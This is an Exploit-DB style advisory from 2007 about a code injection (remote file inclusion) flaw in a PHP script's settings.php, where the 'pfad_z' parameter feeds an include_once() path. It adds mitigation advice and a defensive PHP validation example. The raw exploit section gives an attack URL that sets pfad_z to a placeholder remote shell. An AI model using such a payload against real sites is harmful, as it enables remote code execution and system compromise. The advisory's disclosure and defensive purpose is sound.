by: ThE dE@Th
CVSS: 7.5 (HIGH)
CWE: 94 (Code Injection)
Patch Exists: NO
2007

Code Injection Vulnerability in settings.php

The settings.php file uses the request-supplied 'pfad_z' parameter as the path prefix of an include_once() call, so an attacker can inject arbitrary code through that parameter. This can lead to remote code execution and potentially compromise the entire system.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in any code execution context, such as the path passed to include_once(). Keeping software up to date and applying security patches also helps prevent such vulnerabilities.
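
The validation recommended above, applied to the include_once pattern from settings.php, as an added example that is not part of the original advisory or the affected product's code. The helper name `resolve_inside`, the temporary directory and the sample values are assumptions made for illustration.

```php
<?php
// Added example, not the affected product's code. Function and variable
// names other than $pfad_z and scripts/session.php are hypothetical.
//
// Pattern shown in the advisory (caller-controlled prefix reaches include):
//   include_once($pfad_z."scripts/session.php");

/** Return the canonical path of $relative inside $baseDir, or null. */
function resolve_inside(string $baseDir, string $relative): ?string
{
    // Reject URL/stream-wrapper schemes (http:, ftp:, php:, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)
        || strpos($relative, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $full === false) {
        return null; // base or target does not exist on disk
    }
    // After canonicalisation the target must still sit under the base.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed demo: throwaway application root with scripts/session.php.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pfad_demo_' . getmypid();
mkdir($root . '/scripts', 0700, true);
file_put_contents($root . '/scripts/session.php', "<?php // session bootstrap\n");

// Constructed values standing in for what a request could place in pfad_z.
$samples = ['', './', '../', 'http://example.invalid/x?'];
foreach ($samples as $pfad_z) {
    $path = resolve_inside($root, $pfad_z . 'scripts/session.php');
    printf("%-30s => %s\n", var_export($pfad_z, true), $path ?? 'REJECTED');
    if ($path !== null) {
        include_once $path; // only reached for paths under $root
    }
}

// Preferred fix: ignore the request entirely and fix the prefix server-side.
$pfad_z = $root . DIRECTORY_SEPARATOR;
include_once $pfad_z . 'scripts/session.php';

unlink($root . '/scripts/session.php');
rmdir($root . '/scripts');
rmdir($root);
```

Run with the PHP CLI (7.1 or later); the first two sample prefixes resolve to the file under the demo root and the last two are rejected.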

Exploit-DB raw data:

********************************************************************************
To ConTacT mE:wWw.Asb-May.net/bb
ScRiPt:-http://people.ee.ethz.ch/~dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
Settings.php:-
include_once($pfad_z."scripts/session.php");
********************************************************************************
ExPlOiT:-http://www.Site.com/theme/settings.php?pfad_z=[Shell]
********************************************************************************

# milw0rm.com [2007-02-05]